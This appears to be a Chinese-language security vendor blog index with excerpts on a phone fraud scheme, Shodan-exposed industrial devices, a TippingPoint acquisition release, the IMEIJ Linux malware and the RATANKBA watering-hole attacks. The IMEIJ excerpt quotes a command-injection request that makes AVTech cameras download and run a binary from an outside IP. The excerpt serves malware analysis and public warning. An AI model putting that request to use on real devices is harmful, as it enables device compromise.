先生小姐,你前期的電話費未繳….

「先生小姐,你前期的電話費未繳,我們要通知警方!」

刑事警察局再度公布詐騙集團手法,先利用大多民眾常有忘記繳款的情形,先卸下被害人心防後,再詐騙被害人金錢。

  1. 被害人接獲假冒電信業者來電催繳電話費,被害人稱並未申辦相關門號亦無欠費,假電信業者接著聲稱被害人遭盜辦門號欠費,將協助通知警方報案處理。
  2. 假冒檢警人員來電,稱民眾個資外洩遭盜辦帳戶並涉嫌多起洗錢、詐欺等刑案,需分案調查、遵守偵查不公開原則,並要求被害人將名下所有財產領出,供檢警執行帳戶監管,待查明無不法後,再將資金歸還。
  3. 假書記官與被害人約定交付款項地點,民眾拿著自銀行領出的大筆金錢交付給假書記官,並拿到一張假公文書收據。
  4. 幾個月後,民眾致電地檢署詢問偵辦進度…,始發覺受騙報案。

繼續閱讀

好暴露,洛杉磯!美國前十大城市的網路資產,有多暴露? Shodan 都知道

Shodan 是個會索引網路資產和物聯網(IoT ,Internet of Thing)聯網設備的網路搜尋引擎,它能夠顯示任何聯網設備的 IP地址,並揭露如應用軟體和韌體版本等細節資訊。

掃描網路設備的安全漏洞是個繁瑣的過程,但如果你想要修補這些漏洞來保護設備和系統免於被入侵,那這是必要的。不需要特別的去爬網站,可以利用像 Shodan 這樣的工具來輕鬆地搜尋對外暴露的網路資產。

網路設備因為維修理由而啟用遠端連線能力,會讓機器容易被攻擊

「沒有防護」和「對外暴露」的網路資產並不是指這些設備已經被入侵。而是說它們缺乏安全防護或設定不良,因而容易遭受網路攻擊。有些網路設備甚至會因為維修理由而啟用遠端連線能力,但這會讓機器更容易被攻擊。

根據趨勢科技在2016年 2月所做的 Shodan 掃描資料分析,我們很驚訝地看到幾個跟工業控制系統(ICS)設備和協定相關的結果。ICS設備是用來操作工業及相關過程,如加熱、通風和空調(HVAC)、發電、水處理等。你可以看到樣本如下:

 

 

圖1-2、Shodan搜尋結果顯示出設備的詳細資訊

繼續閱讀

趨勢科技慶祝 TippingPoint 併購一週年,完成包括團隊及技術整合的多項重大里程碑

【2017年3月16日,台北訊】今年三月,全球網路資安解決方案領導廠商趨勢科技 (東京證券交易所股票代碼:4704) 從 Hewlett Packard Enterprise 手中併購 TippingPoint 公司已屆滿一週年。在組織整合的第一年當中,趨勢科技不僅展現了無比的執行力與業務無縫接軌能力,更在產品創新方面發揚光大,讓新的 TippingPoint 交出比去年成長 25% 的業績,並進一步提升市場領導地位。趨勢科技 TippingPoint 最近更在 2017 年「Gartner 入侵防護系統神奇象限」報告當中榮獲「願景完整性」與「執行力」雙重領導者地位[1]。不僅如此,趨勢科技也在 2016 年 NSS Labs 新一代入侵防護系統 (NGIPS) 測試當中榮獲「推薦」的評價。

趨勢科技明瞭組織整合只許成功不許失敗,因此特別簽下了 300 多名原 TippingPoint 員工以確保 2,500 多家 TippingPoint 大型客戶的服務絕不出現斷層。今年三月,該團隊已順利遷進完善且擁有先進研發實驗室的德州奧斯汀新辦公室。

過去這一年,由於 TippingPoint 業務穩定的發展,使得趨勢科技得以延續其創新歷史。TippingPoint 產品不僅更上層樓,而且與趨勢科技原本的產品完美整合,更加鞏固趨勢團隊在企業網路資安市場的地位和名聲。例如,TippingPoint 的 NGIPS 已與趨勢科技 Deep Discovery 進階威脅防護技術整合,形成一套更強大的 Network Defense 網路防禦解決方案。今年一月,TippingPoint 率先成為第一家提供 100 Gbps 封包檢查吞吐量獨立式 NGIPS 解決方案的廠商,讓資料中心和企業網路能享有低延遲高效能的防護。今年二月,TippingPoint 更導入機器學習技術,成為第一家率先採用機器學習技術在透通模式 (in-line) 即時偵測及攔截攻擊的獨立式 NGIPS 廠商。過去 12 個月當中,趨勢科技申請了 16 項有關機器學習在資安情報應用領域的最新專利。

TippingPoint 的加入也帶來了領先業界的強大資安情報與漏洞研究能力,包括:Digital Vaccine® Labs (DVLabs) 數位疫苗實驗室與 Zero Day Initiative (ZDI) 漏洞懸賞計畫。ZDI 在過去一年當中妥善揭露了 678 漏洞,涵蓋 48 家廠商的產品,此外目前仍在處理當中漏洞的還有將近 400 個。趨勢科技因為能夠提早掌握這些尚未公開的漏洞,因而能夠預先為客戶提供零時差防護。

繼續閱讀

攻擊 CGI 漏洞的新 Linux 惡意程式

 

長久以來,Linux 一直是企業平台與物聯網(IoT ,Internet of Thing)裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統,並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及,針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅,其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現,並且在 2016 年 10 月公開揭露。不過在此之前,Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 https://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點,它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上,前述網站指令會讓裝置下載惡意檔案,並且將檔案設定成可執行檔。

圖 1:IMEIJ 的感染流程。 繼續閱讀

RATANKBA入侵攻擊目標經常瀏覽的合法網站,針對企業發動大規模水坑攻擊,台灣也受影響

在二月初,有多家金融機構通報出現惡意軟體感染,而且顯然來源是合法網站。這些攻擊以入侵受信任的網站來感染各產業內被鎖定企業的系統, 是大規模攻擊活動的一部分。這種策略通常被稱為「水坑(watering hole)」攻擊。

最近對波蘭銀行進行的連串惡意軟體攻擊據報會在終端機跟伺服器上出現未知的惡意軟體,還有可疑、加密的程式/可執行檔,更加引人注意的是不尋常的網路活動。中毒系統會連到不尋常的位置,可能是要暗渡陳滄將入侵單位的機密資料送至該處。

趨勢科技發現備受關注的惡意軟體RATANKBA,不僅跟對波蘭銀行的惡意軟體攻擊有關,而且還涉及墨西哥、烏拉圭、英國和智利金融機構所發生的類似事件。它如何感染受害者?有沒有其他惡意軟體參與其中?這攻擊活動是否真的跟俄羅斯網路犯罪集團有關?不過根據我們在惡意軟體內所看到的俄文,我們認為這只是用來混淆攻擊者真面目的偽裝手法。

台灣也受到影響

銀行並不是唯一的目標;也有電信、管理諮詢、資訊技術、保險、航太、教育等企業受害。此外,攻擊活動並非僅局限於北美和歐洲,一些亞太地區,特別是台灣、香港和中國也受到影響。

在此提供進一步的分析和見解,可以補充其他關於此一威脅的研究。

 

圖1、關於RATANKBA的可能感染流程

繼續閱讀